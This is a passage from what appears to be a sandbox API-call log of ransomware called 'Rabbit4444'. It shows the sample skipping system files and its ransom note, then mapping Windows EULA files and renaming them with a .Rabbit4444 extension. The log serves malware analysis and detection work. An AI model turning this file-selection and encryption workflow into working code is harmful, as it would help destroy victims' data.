(lpString1="EULA_fi-fi.htm", lpString2="pagefile.sys") returned -1 [0047.333] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="boot") returned 1 [0047.333] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="ids.txt") returned -1 [0047.333] lstrcmpiW (lpString1="EULA_fi-fi.htm", lpString2="NTUSER.DAT") returned -1 [0047.333] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_fi-fi.htm" | out: lpString1="EULA_fi-fi.htm") returned="EULA_fi-fi.htm" [0047.333] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm", dwFileAttributes=0x0) returned 1 [0047.334] lstrlenW (lpString="EULA_fi-fi.htm") returned 14 [0047.334] lstrlenW (lpString="Rabbit4444") returned 10 [0047.334] lstrcmpiW (lpString1="_fi-fi.htm", lpString2="Rabbit4444") returned -1 [0047.334] lstrlenW (lpString=".dll") returned 4 [0047.334] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.334] lstrlenW (lpString=".lnk") returned 4 [0047.334] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.334] lstrlenW (lpString=".ini") returned 4 [0047.334] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.334] lstrlenW (lpString=".sys") returned 4 [0047.334] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.334] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fi-fi.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.334] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.334] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13864495221) returned 1 [0047.334] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=70746) returned 1 [0047.334] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0047.334] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101ea8 [0047.334] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11760, lpName=0x0) returned 0x298 [0047.335] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11760) returned 0x70000 [0047.339] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.339] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0047.339] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.339] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0047.339] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.339] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0047.339] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.339] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0047.339] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13865015979) returned 1 [0047.339] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0047.340] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101ea8 | out: hHeap=0xe0000) returned 1 [0047.340] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.340] CloseHandle (hObject=0x298) returned 1 [0047.340] CloseHandle (hObject=0x278) returned 1 [0047.343] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm.Rabbit4444") returned 63 [0047.343] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fi-fi.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fi-fi.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fi-fi.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.344] InterlockedExchangeAdd (in: Addend=0xff618, Value=70752 | out: Addend=0xff618) returned 10701152 [0047.344] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3086 [0047.344] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3e0ee6, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3e0ee6, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x10f0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_fr-ca.htm", cAlternateFileName="EULA_F~2.HTM")) returned 1 [0047.344] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.344] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.344] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="Rabbit4444.exe") returned -1 [0047.344] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2=".") returned 1 [0047.344] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="..") returned 1 [0047.344] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="windows") returned -1 [0047.344] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="bootmgr") returned 1 [0047.344] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="pagefile.sys") returned -1 [0047.344] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="boot") returned 1 [0047.344] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="ids.txt") returned -1 [0047.344] lstrcmpiW (lpString1="EULA_fr-ca.htm", lpString2="NTUSER.DAT") returned -1 [0047.344] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_fr-ca.htm" | out: lpString1="EULA_fr-ca.htm") returned="EULA_fr-ca.htm" [0047.344] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm", dwFileAttributes=0x0) returned 1 [0047.344] lstrlenW (lpString="EULA_fr-ca.htm") returned 14 [0047.344] lstrlenW (lpString="Rabbit4444") returned 10 [0047.345] lstrcmpiW (lpString1="_fr-ca.htm", lpString2="Rabbit4444") returned -1 [0047.345] lstrlenW (lpString=".dll") returned 4 [0047.345] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.345] lstrlenW (lpString=".lnk") returned 4 [0047.345] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.345] lstrlenW (lpString=".ini") returned 4 [0047.345] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.345] lstrlenW (lpString=".sys") returned 4 [0047.345] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.345] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-ca.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.345] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.345] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13865565968) returned 1 [0047.345] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=69386) returned 1 [0047.345] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0047.345] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0047.345] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11210, lpName=0x0) returned 0x298 [0047.346] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11210) returned 0x70000 [0047.350] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.350] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0047.350] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.350] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0047.350] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.350] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0047.350] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.350] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0047.350] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13866111589) returned 1 [0047.350] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0047.350] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0047.351] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.351] CloseHandle (hObject=0x298) returned 1 [0047.351] CloseHandle (hObject=0x278) returned 1 [0047.354] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm.Rabbit4444") returned 63 [0047.354] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-ca.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-ca.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-ca.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.354] InterlockedExchangeAdd (in: Addend=0xff618, Value=69392 | out: Addend=0xff618) returned 10771904 [0047.354] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3091 [0047.354] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3e2266, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3e2266, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0x10f0a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_fr-fr.htm", cAlternateFileName="EULA_F~3.HTM")) returned 1 [0047.355] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.355] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.355] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="Rabbit4444.exe") returned -1 [0047.355] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2=".") returned 1 [0047.355] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="..") returned 1 [0047.355] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="windows") returned -1 [0047.355] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="bootmgr") returned 1 [0047.355] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="pagefile.sys") returned -1 [0047.355] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="boot") returned 1 [0047.355] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="ids.txt") returned -1 [0047.355] lstrcmpiW (lpString1="EULA_fr-fr.htm", lpString2="NTUSER.DAT") returned -1 [0047.355] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_fr-fr.htm" | out: lpString1="EULA_fr-fr.htm") returned="EULA_fr-fr.htm" [0047.355] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm", dwFileAttributes=0x0) returned 1 [0047.356] lstrlenW (lpString="EULA_fr-fr.htm") returned 14 [0047.356] lstrlenW (lpString="Rabbit4444") returned 10 [0047.356] lstrcmpiW (lpString1="_fr-fr.htm", lpString2="Rabbit4444") returned -1 [0047.356] lstrlenW (lpString=".dll") returned 4 [0047.357] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.357] lstrlenW (lpString=".lnk") returned 4 [0047.357] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.357] lstrlenW (lpString=".ini") returned 4 [0047.357] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.357] lstrlenW (lpString=".sys") returned 4 [0047.357] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.357] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-fr.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.357] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.357] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13866760325) returned 1 [0047.357] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=69386) returned 1 [0047.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0047.357] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0047.357] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x11210, lpName=0x0) returned 0x298 [0047.359] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x11210) returned 0x70000 [0047.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108bc8 [0047.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0047.362] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0047.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.362] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108bc8 | out: hHeap=0xe0000) returned 1 [0047.362] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13867321452) returned 1 [0047.363] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0047.363] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0047.363] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0047.363] CloseHandle (hObject=0x298) returned 1 [0047.363] CloseHandle (hObject=0x278) returned 1 [0047.366] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm.Rabbit4444") returned 63 [0047.366] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-fr.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_fr-fr.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_fr-fr.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.370] InterlockedExchangeAdd (in: Addend=0xff618, Value=69392 | out: Addend=0xff618) returned 10841296 [0047.370] InterlockedExchangeAdd (in: Addend=0xff624, Value=5 | out: Addend=0xff624) returned 3096 [0047.370] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3e35dd, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3e35dd, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xd3187, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_he-il.htm", cAlternateFileName="EULA_H~1.HTM")) returned 1 [0047.370] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.370] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.370] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="Rabbit4444.exe") returned -1 [0047.370] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2=".") returned 1 [0047.370] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="..") returned 1 [0047.370] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="windows") returned -1 [0047.370] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="bootmgr") returned 1 [0047.370] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="pagefile.sys") returned -1 [0047.370] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="boot") returned 1 [0047.371] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="ids.txt") returned -1 [0047.371] lstrcmpiW (lpString1="EULA_he-il.htm", lpString2="NTUSER.DAT") returned -1 [0047.371] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_he-il.htm" | out: lpString1="EULA_he-il.htm") returned="EULA_he-il.htm" [0047.371] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm", dwFileAttributes=0x0) returned 1 [0047.371] lstrlenW (lpString="EULA_he-il.htm") returned 14 [0047.371] lstrlenW (lpString="Rabbit4444") returned 10 [0047.371] lstrcmpiW (lpString1="_he-il.htm", lpString2="Rabbit4444") returned -1 [0047.371] lstrlenW (lpString=".dll") returned 4 [0047.371] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.371] lstrlenW (lpString=".lnk") returned 4 [0047.371] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.371] lstrlenW (lpString=".ini") returned 4 [0047.371] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.371] lstrlenW (lpString=".sys") returned 4 [0047.371] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.371] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_he-il.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.371] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.371] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13868218539) returned 1 [0047.371] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=864647) returned 1 [0047.372] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x1178d8 [0047.372] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101518 [0047.372] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xd3490, lpName=0x0) returned 0x298 [0047.375] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xd3490) returned 0x1090000 [0047.395] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.395] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109370 [0047.395] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.395] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109488 [0047.395] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x10c928 [0047.395] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0047.396] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x10c928 | out: hHeap=0xe0000) returned 1 [0047.396] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109370 | out: hHeap=0xe0000) returned 1 [0047.396] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=13870633318) returned 1 [0047.396] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1178d8 | out: hHeap=0xe0000) returned 1 [0047.396] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101518 | out: hHeap=0xe0000) returned 1 [0047.396] UnmapViewOfFile (lpBaseAddress=0x1090000) returned 1 [0047.403] CloseHandle (hObject=0x298) returned 1 [0047.403] CloseHandle (hObject=0x278) returned 1 [0047.426] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm.Rabbit4444") returned 63 [0047.426] MoveFileExW (lpExistingFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_he-il.htm"), lpNewFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_he-il.htm.Rabbit4444" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_he-il.htm.rabbit4444"), dwFlags=0x1) returned 1 [0047.427] InterlockedExchangeAdd (in: Addend=0xff618, Value=864656 | out: Addend=0xff618) returned 10910688 [0047.427] InterlockedExchangeAdd (in: Addend=0xff624, Value=24 | out: Addend=0xff624) returned 3101 [0047.427] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea3e977f, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0xea3e977f, ftLastAccessTime.dwHighDateTime=0x1d32736, ftLastWriteTime.dwLowDateTime=0x1939000, ftLastWriteTime.dwHighDateTime=0x1d2ea8a, nFileSizeHigh=0x0, nFileSizeLow=0xfd68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EULA_hr-hr.htm", cAlternateFileName="EULA_H~2.HTM")) returned 1 [0047.427] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0047.427] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0047.427] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="Rabbit4444.exe") returned -1 [0047.427] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2=".") returned 1 [0047.427] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="..") returned 1 [0047.427] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="windows") returned -1 [0047.427] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="bootmgr") returned 1 [0047.427] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="pagefile.sys") returned -1 [0047.427] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="boot") returned 1 [0047.427] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="ids.txt") returned -1 [0047.428] lstrcmpiW (lpString1="EULA_hr-hr.htm", lpString2="NTUSER.DAT") returned -1 [0047.428] lstrcpyW (in: lpString1=0x130eb84, lpString2="EULA_hr-hr.htm" | out: lpString1="EULA_hr-hr.htm") returned="EULA_hr-hr.htm" [0047.428] SetFileAttributesW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm", dwFileAttributes=0x0) returned 1 [0047.428] lstrlenW (lpString="EULA_hr-hr.htm") returned 14 [0047.428] lstrlenW (lpString="Rabbit4444") returned 10 [0047.429] lstrcmpiW (lpString1="_hr-hr.htm", lpString2="Rabbit4444") returned -1 [0047.429] lstrlenW (lpString=".dll") returned 4 [0047.429] lstrcmpiW (lpString1=".htm", lpString2=".dll") returned 1 [0047.429] lstrlenW (lpString=".lnk") returned 4 [0047.429] lstrcmpiW (lpString1=".htm", lpString2=".lnk") returned -1 [0047.429] lstrlenW (lpString=".ini") returned 4 [0047.429] lstrcmpiW (lpString1=".htm", lpString2=".ini") returned -1 [0047.429] lstrlenW (lpString=".sys") returned 4 [0047.429] lstrcmpiW (lpString1=".htm", lpString2=".sys") returned -1 [0047.429] CreateFileW (lpFileName="C:\\Windows10Upgrade\\resources\\ux\\EULA\\EULA_hr-hr.htm" (normalized: "c:\\windows10upgrade\\resources\\ux\\eula\\eula_hr-hr.htm"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0047.429] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0047.429] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=13873968449) returned 1 [0047.429] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=64872) returned 1 [0047.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117680 [0047.429] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101d10 [0047.429] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x10070, lpName=0x0) returned 0x298 [0047.430] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x10070) returned 0x70000 [0047.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0xf12e0 [0047.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1095a0 [0047.434] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0xf12e0 | out: hHeap=0xe0000) returned 1 [0047.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108ce0 [0047.434] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 